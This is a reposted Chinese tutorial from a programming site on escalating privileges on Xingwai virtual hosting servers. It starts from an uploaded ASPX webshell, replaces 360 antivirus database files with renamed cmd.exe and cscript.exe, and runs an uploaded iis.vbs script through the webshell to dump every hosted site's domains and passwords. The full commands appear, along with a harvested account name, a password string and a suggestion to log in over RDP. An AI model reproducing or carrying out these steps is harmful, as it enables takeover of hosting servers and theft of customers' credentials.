欢迎您访问 最编程 本站为您分享编程语言代码,编程技术文章!
您现在的位置是: 首页

星外提权

最编程 2024-07-04 21:52:11
...

星外提权方法

打开我们的aspx马 http://www.xxxxoooo.com/template/default/html/z.aspx

第一步 查找 c:\Program Files\360\360Safe\deepscan\Section\ 这个目录中的mutex.db 这个文件是360安全卫士的病毒库文件 我们要把这个文件替换成可执行的文件 打我们的 提权专用 文件夹 打开后,把cscript.exe命名为mutex.db 然后在把这文件上传到 c:\Program Files\360\360Safe\deepscan\Section\ 这个文件夹,上传后会替换mutex.db这个文件 上传替换成功

第二步 再次查找 c:\Program Files\360\360SD\deepscan\Section\ 这个目录中的mutex.db 和第一步一样 把cmd.exe命名为mutex.db 命名好以后上传 然后上传到 c:\Program Files\360\360SD\deepscan\Section\ 这个目录下,上传后会替换mutex.db这个文件 上传替换成功

第三步 还有一步没有做 要把 提权专用 文件中的iis.vbs上传到网站根目录下 好了,我上传好了

第四步 开始查看服务器上所有域名和密码 打开aspx马中的 cmdshell CmdPath:      输入cmd.exe替换的mutex.db的地址 Argument:      是输入命令的地方

命令是

/c "c:\Program Files\360\360Safe\deepscan\Section\mutex.db" d:\freehost\web\iis.vbs

上边的那句是命令方法 这个命令的意思就是 在c盘下执行 cscript.exe 使 iis.vbs能收集网站的所有域名和密码 d:\freehost\web\ 是咱们已经拿到webshell站的根目录

然后点确定

晕死,出错了

重试一下 丢大人了,上传目录问题 上边的命令改为 /c "c:\Program Files\360\360Safe\deepscan\Section\mutex.db" d:\freehost\damute\web\template\default\html\iis.vbs 这个命令,刚才是上传的地址没有弄在根目录下

下面我们开始 时间有些长,我们等着 出来了

我们把这些保存起来

查找星外受控端 找到了 这个就是用户名  freehostrunat 密码是:  991b95d33a17713068403079d4fe40a4!7 如果对方开了3389 我们就去登录吧

完成了。送我的哥们 酷帅王子 丢人了!!呵呵!

c:\Program Files\360\360Safe\deepscan\Section\mutex.db  cir c:\Program Files\360\360SD\deepscan\Section\mutex.db   cmd

 

d:\freehost\damute\web\

/c “c:\Documents and Settings\All Users\Application Data\Microsoft\Media Index\cscript.exe” d:\freehost\web\1.vbs

 

/c "c:\Program Files\360\360Safe\deepscan\Section\mutex.db" d:\freehost\damute\web\kkkkk.vbs

推荐阅读